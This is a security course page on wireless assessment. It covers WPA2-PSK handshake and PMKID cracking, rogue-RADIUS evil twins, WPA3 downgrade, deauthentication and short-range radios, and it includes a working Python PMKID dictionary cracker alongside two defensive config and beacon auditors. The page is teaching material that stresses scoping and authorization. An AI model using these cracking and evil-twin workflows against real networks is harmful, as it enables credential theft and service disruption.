Security · Topic 25 · Part V — Specialized assessment targets

Wireless assessment

The attacker is not inside the building — they are in the parking lot. Wireless extends the network's attack surface beyond every physical perimeter.

Syllabus: § Assessment of Infrastructure → Wireless and short-range radio
Topic 25 · Radio attack surface

What can an attacker do from radio range?

By the end of this topic you can:
  • Scope a wireless assessment, distinguishing it from a generic network test
  • Identify the authentication and encryption mode of an 802.11 network and its known weaknesses
  • Execute standard attack workflows against WPA2-PSK, WPA3-SAE, and 802.1X / WPA-Enterprise
  • Recognize the role of evil-twin, captive-portal, and rogue-AP attacks in real engagements
  • Place Bluetooth, BLE, Zigbee, and other short-range radios in the assessment landscape
  • Produce wireless findings the network team can act on

Scoping a wireless engagement

  • Networks in scope: SSIDs, BSSIDs, bands (2.4 / 5 / 6 GHz), auth mode, physical location
  • Neighbouring airspace: passive monitoring catches third-party traffic; active attacks must not target third-party SSIDs
  • Credential capture authorized? Handshake capture for offline cracking must be explicit
  • Guest networks: often a separate scoping question
  • Physical location and timing: lobby, conference room, parking lot, roof
  • Spectrum legality: certain bands require licensing in Switzerland and the EU; tester equipment must comply
  • Disruption tolerance: active deauthentication briefly disrupts service — the scope must say whether this is acceptable
Unique constraint The airspace is shared. Wireless scoping carries a regulatory dimension that generic network testing does not.

802.11 authentication modes

Mode                      | Status                             | Key weakness
Open / unauthenticated    | In use for guest + captive portal  | All traffic in cleartext on the air
WEP                       | Broken since mid-2000s             | Statistical key recovery; should not exist
WPA2-PSK (CCMP/AES)       | Most common                        | 4-way handshake (or PMKID) → offline dictionary attack on PSK
WPA2-Enterprise / 802.1X  | Corporate standard                 | Weak when client does not validate RADIUS certificate
WPA3-SAE                  | Replacing WPA2-PSK                 | Dragonblood (2019); downgrade in transition mode
OWE                       | Encrypted-but-unauthenticated open | Better than open; not a replacement for authenticated modes

Real clients typically run a mix: WPA2-Enterprise on corporate, WPA2-PSK on IoT/BYOD, open + captive on guest, and a forgotten legacy SSID.

Reconnaissance — passive survey first

  1. Survey the airspace: walk the perimeter with airodump-ng, Kismet, or a vendor tool. Enumerate SSIDs, BSSIDs, channels, signal, standards, auth mode.
  2. Map AP placement: a heatmap shows where coverage leaks. Strong corporate-SSID signal in the parking lot is itself a finding.
  3. Identify client probes: devices broadcast previously connected SSIDs. A laptop probing for Starbucks WiFi is opportunistic-attack material.
  4. Read management frames: beacons, probe responses, and association requests leak vendor info, capabilities, and WPS state.

WPA2-PSK attack workflow

  1. Capture the 4-way handshake: wait for a client to authenticate, or send deauth frames to force a reconnection (aireplay-ng, mdk4). Capture with airodump-ng; messages 1 and 2 (ANonce, SNonce and the MIC) are sufficient for cracking.
  2. Offline dictionary attack: hashcat mode 22000 (supersedes 2500 and 16800; convert captures with hcxpcapngtool). Wordlists: rockyou, client name + year + season, rule sets.
  3. PMKID attack (optional): many APs include a PMKID in the RSN PMKID KDE of EAPOL message 1, which the AP sends as soon as any station associates, so no legitimate client has to be present. Capture with hcxdumptool, convert with hcxpcapngtool, crack with hashcat mode 22000.
Mitigations to assess
  • PSK length and complexity policy
  • Frequent PSK rotation
  • Client MAC isolation on the SSID
  • Segmentation: wireless SSID ↔ internal network
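The offline part of the workflow above, as an added example that is not part of the original page: it derives the PMK from a candidate passphrase, reproduces the PMKID an AP places in EAPOL message 1, emits the hashcat mode 22000 line, and runs a small wordlist against a captured PMKID. The SSID, MAC addresses, wordlist and the "captured" PMKID are constructed so the script runs offline; in an engagement the PMKID comes from a hcxdumptool capture.

```python
"""WPA2-PSK offline attack in miniature: PMK derivation, PMKID reconstruction,
hashcat 22000 line formatting, and a wordlist run against a captured PMKID.

Added example, not code from the course page. Derivation follows IEEE 802.11:
PMK   = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC) truncated to 16 bytes
SSID, MAC addresses, wordlist and the "captured" PMKID are CONSTRUCTED.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed engagement data (assumptions for illustration only).
SSID = "ACME-IoT"
AP_MAC = bytes.fromhex("f0ad4e00a1b2")   # BSSID of the target AP
STA_MAC = bytes.fromhex("a4c3f000beef")  # our own interface during the PMKID request
TRUE_PASSPHRASE = "Acme2024!"            # what the network team actually configured
WORDLIST = ["password", "acmewifi", "Acme2023!", "Winter2024", "Acme2024!", "Summer2024!"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK. 4096 PBKDF2 rounds are the only work factor in WPA2-PSK, which is
    why the attack is GPU-bound and why passphrase entropy, not rotation alone, decides it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID exactly as the AP puts it in the RSN PMKID KDE of EAPOL message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat -m 22000 input line for a PMKID (type 01; the EAPOL-MIC form is type 02)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: no further radio contact with the AP is needed."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:        # outside the WPA passphrase length bounds
            continue
        pmkid = derive_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(pmkid, captured):
            return candidate
    return None


def demo() -> Optional[str]:
    """Build the 'captured' PMKID from the constructed passphrase, then crack it."""
    captured = derive_pmkid(derive_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC)
    print(hashcat_22000_line(captured, AP_MAC, STA_MAC, SSID))  # what you would hand to hashcat
    return crack_pmkid(captured, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Note that the per-candidate cost is the PBKDF2 call, and hashcat spends its time in exactly the same place; the "client name + year + season" pattern in the wordlist is what a weak PSK policy looks like in practice.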

WPA-Enterprise — rogue RADIUS impersonation

The dominant pattern:

  1. Stand up an evil-twin SSID + rogue RADIUS server (hostapd-wpe, eaphammer, freeradius-wpe)
  2. Client roams to rogue AP; begins EAP authentication
  3. Rogue RADIUS captures the inner exchange
  4. For EAP-PEAP / MSCHAPv2: crack the challenge-response offline (asleap, hashcat)
  5. For EAP-TTLS/PAP: inner password arrives in cleartext

EAP-TLS (mutual cert): attacker cannot impersonate without the client certificate — the strong mode.

The decisive control Server certificate validation. A correctly configured client validates the RADIUS server's certificate against a trusted CA and a specific subject. Clients that trust any presented certificate are wide open.

The finding targets how client devices are configured (MDM / GPO), not the AP itself.
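Because the finding lives in client configuration, the check is a configuration review. The following added example (not code from the page and not part of wpa_supplicant) parses wpa_supplicant.conf network blocks and applies the checks a reviewer of a Linux 802.1X profile would run; the Windows and macOS equivalents are the corresponding GPO / MDM payload settings. The two profiles in the constructed config are made up: the first is the wide-open pattern a rogue RADIUS relies on, the second the hardened one. The option names are real wpa_supplicant keys.

```python
"""Audit wpa_supplicant 802.1X (WPA-EAP) profiles for server-certificate validation.

Added example; not code from the course page or from the wpa_supplicant project.
CONSTRUCTED_CONFIG is made up for illustration. Option names are real
wpa_supplicant.conf keys (ca_cert, domain_match, domain_suffix_match,
altsubject_match, subject_match, phase2).
"""
import re

CONSTRUCTED_CONFIG = """
# Profile 1: what a rogue RADIUS (hostapd-wpe / eaphammer) hopes to see
network={
    ssid="ACME-Corp"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

# Profile 2: pinned CA plus the expected server name
network={
    ssid="ACME-Corp"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    anonymous_identity="anonymous@acme.example"
    password="hunter2"
    ca_cert="/etc/ssl/certs/acme-radius-ca.pem"
    domain_match="radius.acme.example"
    phase2="auth=MSCHAPV2"
}
"""

NETWORK_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)
TUNNELED_EAP = {"PEAP", "TTLS", "FAST"}          # methods with an inner (phase 2) exchange
NAME_CHECKS = ("domain_match", "domain_suffix_match", "altsubject_match")


def parse_networks(conf: str) -> list:
    """One dict per network={} block; quotes stripped, '#' comments ignored
    (a password containing '#' would need a quote-aware parser)."""
    networks = []
    for block in NETWORK_BLOCK.finditer(conf):
        net = {}
        for line in block.group(1).splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, value = line.split("=", 1)
                net[key.strip()] = value.strip().strip('"')
        networks.append(net)
    return networks


def audit_network(net: dict) -> list:
    """Findings for a single profile; empty list means it passes these checks."""
    findings = []
    if not any(k.startswith("WPA-EAP") for k in net.get("key_mgmt", "").split()):
        return findings                                   # PSK/open profile, not 802.1X
    eap = net.get("eap", "").upper()
    if eap == "TLS" and not (net.get("client_cert") and net.get("private_key")):
        findings.append("EAP-TLS profile without client_cert/private_key")
    if eap in TUNNELED_EAP | {"TLS"}:
        if not net.get("ca_cert"):
            findings.append("no ca_cert: any server certificate is accepted, "
                            "a rogue RADIUS terminates the tunnel and sees the inner exchange")
        if not any(k in net for k in NAME_CHECKS):
            findings.append("no domain_match/domain_suffix_match/altsubject_match: "
                            "any certificate issued by the trusted CA passes")
        if "subject_match" in net:
            findings.append("subject_match is a substring comparison; replace with domain_match")
    phase2 = net.get("phase2", "").upper()
    if eap == "TTLS" and "AUTH=PAP" in phase2:
        findings.append("EAP-TTLS/PAP: inner password is cleartext to whoever terminates the tunnel")
    if eap in TUNNELED_EAP and "MSCHAPV2" in phase2 and findings:
        findings.append("captured MSCHAPv2 challenge/response is crackable offline "
                        "(asleap, hashcat -m 5500)")
    return findings


def audit_config(conf: str) -> list:
    return [audit_network(net) for net in parse_networks(conf)]


if __name__ == "__main__":
    for i, findings in enumerate(audit_config(CONSTRUCTED_CONFIG), 1):
        print("profile %d:" % i, findings or "OK")
```

The same two controls, a pinned CA and an expected server name, are what an evil-twin test against the client fleet verifies empirically: a supplicant that passes this audit will refuse the rogue server's certificate before any inner credential leaves the device.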

WPA3 — downgrade and Dragonblood

Downgrade (transition mode) A WPA3-SAE + WPA2-PSK dual-mode AP lets an attacker force a WPA2 association and attack the WPA2 handshake as usual. A "WPA3 network" in transition mode is not immune to the WPA2-PSK workflow.
Dragonblood (2019) Side-channel, timing, and downgrade attacks on early WPA3-SAE implementations (Vanhoef & Ronen). The protocol-level fix is the hash-to-element (SAE-H2E) password element derivation later added to the WPA3 specification; current firmware and supplicant releases are largely patched, legacy devices may still be vulnerable.
Assessment note Always check vendor advisories for the equipment in scope. Confirm whether transition mode is enabled (both a PSK and an SAE AKM suite advertised in the beacon's RSN element); verify WPA2 has been disabled on networks advertised as WPA3.

Evil twin, captive portal, rogue AP

Client-facing attacks

  • Evil twin: rogue AP with the same SSID (optionally BSSID-spoofed); clients with poor selection logic associate with the strongest signal
  • Captive-portal harvesting: rogue AP presents a fake portal imitating the company's SSO page to harvest credentials
  • Karma / probe-response: AP responds to every client probe request — client auto-connects to a network it "recognizes"

Tools: wifiphisher, airgeddon, eaphammer

Infrastructure-facing attack

Rogue AP on the wire A small AP plugged into a corporate switch port bridges the internal network to the airspace. NAC / 802.1X on switch ports is the missing control.

Distinct from the airspace attack — this is a physical-access finding that creates a wireless path.

Deauthentication and 802.11w / PMF

Deauthentication (deauth) frames are used in many attack workflows to force client reconnection and capture handshakes. They also function as a pure denial-of-service tool.

  • Without PMF, deauth frames are unauthenticated — any station can send them
  • 802.11w (Management Frame Protection) authenticates management frames, preventing the unprotected deauth attack
  • PMF is mandatory in WPA3; optional in WPA2
Assessment task Confirm whether PMF is enforced (not merely advertised as capable). A network that advertises PMF support but does not require it still allows unprotected deauth.
Scope constraint Continuous-wave jamming is illegal in most jurisdictions and out of scope for all normal engagements. Tactical deauth for short windows is in scope only when explicitly authorized.
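Both checks, transition mode (above, under WPA3) and PMF enforcement versus mere capability, are answered by the RSN information element in the beacon. The following added example (not code from the course page) parses that element as it appears in a capture and returns the findings a report would carry. The three beacons at the bottom are constructed with the included encoder; in a survey you would paste the raw bytes Wireshark shows as "RSN Information".

```python
"""Classify an 802.11 RSN element (element ID 48, from a beacon or probe response)
for WPA3 transition mode and PMF (802.11w) enforcement.

Added example, not part of the course page. Field layout and suite selectors
follow IEEE 802.11 (OUI 00-0f-ac; RSN Capabilities bit 6 = MFPR, bit 7 = MFPC).
The sample beacons are CONSTRUCTED with build_rsn_ie().
"""
import struct
from dataclasses import dataclass

OUI = b"\x00\x0f\xac"
CIPHER_NAMES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM_NAMES = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
             6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 11: "802.1X-SuiteB",
             12: "802.1X-SuiteB-192", 18: "OWE"}
MFPR = 1 << 6            # Management Frame Protection Required
MFPC = 1 << 7            # Management Frame Protection Capable
RSN_ELEMENT_ID = 48


@dataclass
class RSN:
    group_cipher: str
    pairwise_ciphers: list
    akms: list
    mfp_capable: bool
    mfp_required: bool


def _suite_name(raw: bytes, table: dict) -> str:
    if raw[:3] != OUI:
        return "vendor:" + raw.hex()
    return table.get(raw[3], "unknown:%d" % raw[3])


def _suite_bytes(name: str, table: dict) -> bytes:
    ids = {v: k for k, v in table.items()}
    return OUI + bytes([ids[name]])


def _take_suites(body: bytes, off: int, count: int, table: dict):
    end = off + 4 * count
    if end > len(body):
        raise ValueError("truncated suite list")
    return [_suite_name(body[i:i + 4], table) for i in range(off, end, 4)], end


def parse_rsn_ie(ie: bytes) -> RSN:
    """Parse element ID + length + body. A missing RSN Capabilities field
    (allowed by the standard) is treated as 0, i.e. no PMF."""
    if len(ie) < 2 or ie[0] != RSN_ELEMENT_ID or len(ie) < 2 + ie[1]:
        raise ValueError("not a complete RSN element")
    body = ie[2:2 + ie[1]]
    try:
        (version,) = struct.unpack_from("<H", body, 0)
        if version != 1:
            raise ValueError("unsupported RSN version %d" % version)
        group = _suite_name(body[2:6], CIPHER_NAMES)
        (n_pair,) = struct.unpack_from("<H", body, 6)
        pairwise, off = _take_suites(body, 8, n_pair, CIPHER_NAMES)
        (n_akm,) = struct.unpack_from("<H", body, off)
        akms, off = _take_suites(body, off + 2, n_akm, AKM_NAMES)
    except struct.error as exc:
        raise ValueError("truncated RSN element") from exc
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    return RSN(group, pairwise, akms, bool(caps & MFPC), bool(caps & MFPR))


def build_rsn_ie(group: str, pairwise: list, akms: list, caps: int) -> bytes:
    """Encode an RSN element; used here only to construct sample beacons."""
    body = struct.pack("<H", 1) + _suite_bytes(group, CIPHER_NAMES)
    body += struct.pack("<H", len(pairwise)) + b"".join(_suite_bytes(p, CIPHER_NAMES) for p in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(_suite_bytes(a, AKM_NAMES) for a in akms)
    body += struct.pack("<H", caps)
    return bytes([RSN_ELEMENT_ID, len(body)]) + body


def assess(rsn: RSN) -> list:
    """Findings a wireless report would carry for this SSID's RSN configuration."""
    findings = []
    if {"SAE", "FT-SAE"} & set(rsn.akms) and {"PSK", "PSK-SHA256", "FT-PSK"} & set(rsn.akms):
        findings.append("WPA3 transition mode: a WPA2-PSK AKM is still advertised, "
                        "so the 4-way-handshake/PMKID workflow applies unchanged")
    if "TKIP" in rsn.pairwise_ciphers or rsn.group_cipher == "TKIP":
        findings.append("TKIP enabled: legacy cipher, and PMF cannot be negotiated over it")
    if not rsn.mfp_capable:
        findings.append("PMF not supported: deauth/disassoc frames are unauthenticated")
    elif not rsn.mfp_required:
        findings.append("PMF capable but not required: clients that skip 802.11w "
                        "can still be deauthenticated with forged frames")
    return findings


SAMPLE_BEACONS = {  # constructed
    "ACME-IoT (WPA2/WPA3 transition, PMF optional)": build_rsn_ie("CCMP-128", ["CCMP-128"], ["PSK", "SAE"], MFPC),
    "ACME-Secure (WPA3-only, PMF required)": build_rsn_ie("CCMP-128", ["CCMP-128"], ["SAE"], MFPC | MFPR),
    "ACME-Legacy (WPA2-PSK, no PMF)": build_rsn_ie("TKIP", ["CCMP-128", "TKIP"], ["PSK"], 0),
}


def survey_findings() -> dict:
    return {ssid: assess(parse_rsn_ie(ie)) for ssid, ie in SAMPLE_BEACONS.items()}


if __name__ == "__main__":
    for ssid, findings in survey_findings().items():
        print(ssid)
        for f in findings or ["no RSN-level findings"]:
            print("  -", f)
```

Reading MFPC without MFPR is the "advertised but not enforced" case the assessment task above asks you to distinguish; an SAE-only network with MFPR set is what a network "advertised as WPA3" should look like.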

Wireless intrusion detection (WIDS / WIPS)

Enterprises with sensitive airspace deploy WIDS / WIPS (Aruba RFProtect, Cisco wIPS, Extreme AirDefense) to detect rogue APs, evil twins, and unauthorized deauth.

The presence of WIPS does not preclude testing — it changes the testing posture and the expected findings.

What to assess
  • Is WIDS / WIPS deployed at all?
  • What signatures does it detect — and what does it miss?
  • How quickly do alerts reach a human responder?
  • Does WIPS automatically contain rogue APs, or only alert?

Beyond 802.11 — short-range radio landscape

Bluetooth / BLE

Peripherals, beacons, badge readers, medical devices. Attacks: passive sniffing (Ubertooth One, Sniffle on a TI CC26x2); pairing-mode abuse (Just Works pairing offers no MITM protection); GATT enumeration of services that require no authentication.

Zigbee / Z-Wave / Thread

Smart-building, lighting, sensor networks. Older Zigbee deployments rely on the well-known default trust center link key. Tools: KillerBee with an ApiMote or a Sonoff Zigbee 3.0 USB dongle flashed with sniffer firmware; nRF52840 dongles with Nordic's 802.15.4 sniffer for Wireshark. Z-Wave sits in the sub-GHz bands (868 MHz in Europe) and needs an SDR or a Yardstick One rather than a 2.4 GHz tool.

NFC / RFID

Badge readers, payment terminals. Many older HID, MIFARE, and iCLASS variants are clonable with a Proxmark3 or a cheap reader. (Physical-intrusion overlap — see Topic 08.)

For a general infrastructure assessment: enumerate what radios are present, flag the high-risk ones, scope a specialist engagement for depth.

Tooling and hardware

Hardware

  • Monitor-mode-capable USB Wi-Fi adapter (Alfa AWUS036ACM / ACH or equivalent)
  • Wi-Fi 6 / 6E cards as drivers mature (updated kernels required)
  • Bluetooth / BLE: Texas Instruments CC26x2 (Sniffle), Ubertooth One

Protocol analysis

  • Wireshark with radiotap-capable captures — excellent 802.11 dissection

Software

  • Capture / survey: airodump-ng, kismet, hcxdumptool
  • Deauth / injection: aireplay-ng, mdk4
  • Cracking: hashcat (mode 22000), aircrack-ng
  • Rogue AP / evil twin: hostapd-wpe, eaphammer, wifiphisher, airgeddon
  • BLE / Bluetooth: bluez, gatttool, bluetoothctl, Sniffle

Methodology — a typical wireless engagement

  1. Scope: SSIDs in scope, physical location, authorized tests, neighbouring-airspace handling
  2. Survey: passive walk-around, heatmap, SSID and client enumeration
  3. Per-SSID attack: auth-mode identification; standard workflow for each mode
  4. Rogue AP / evil twin: client selection, cert validation, credential harvesting
  5. Switch-side rogue AP: can an unauthorized AP plug into a switch port and work?
  6. WIDS / WIPS: what is detected, how fast does it reach a human
  7. Radio inventory: BT, BLE, Zigbee, RFID; high-level posture

Reporting typically mixes configuration findings (PMF disabled, transition mode, weak PSK policy) and deployment findings (signal leak, slow rogue-AP detection, client cert validation off).

Check — rogue RADIUS and certificate validation

Reflection

Walk through the rogue-RADIUS attack against EAP-PEAP / MSCHAPv2. Where does the cryptographic weakness lie, and what client-side control defeats it?

Answer

The tester's rogue AP presents a fake RADIUS server. The client begins EAP-PEAP, the server offers a certificate the client does not validate, and the TLS tunnel terminates at the attacker, who now sees the inner MSCHAPv2 exchange. The cryptographic weakness is MSCHAPv2 itself: the response is three DES encryptions of an 8-byte challenge hash under keys cut from the user's NT hash, so a single captured challenge/response pair is enough for an offline dictionary attack (asleap, hashcat mode 5500) or, at worst for the defender, an exhaustive 2^56 DES search. The defeating control is server certificate validation configured via MDM / GPO: a specific trusted CA and an expected server name must be checked before the inner exchange begins.

What you take home

  • Wireless extends the attack surface to anyone in radio range — scoping must address the shared airspace explicitly
  • WPA2-PSK is cracked offline once the 4-way handshake (or PMKID) is captured; PSK strength and rotation are the key controls
  • WPA2-Enterprise is only as strong as the client's certificate validation policy
  • WPA3 in transition mode can be downgraded to WPA2 — "WPA3 deployed" is not sufficient without disabling WPA2 fallback
  • Evil-twin and captive-portal attacks target client behavior, not protocol weaknesses; rogue APs on switch ports bypass the airspace entirely
  • 802.11w (PMF) prevents unprotected deauth; its enforcement — not just capability — must be verified
  • Beyond 802.11, BLE, Zigbee, and RFID add radio surface that warrants at minimum an inventory and a risk posture

Next: Topic 26 — Cloud assessment. The attack surface moves from radio range to API endpoints and identity planes.

END · TOPIC 25

Scope the airspace. Test what is authorized.

Before the lab: confirm your USB Wi-Fi adapter passes through to the VM and appears in monitor mode.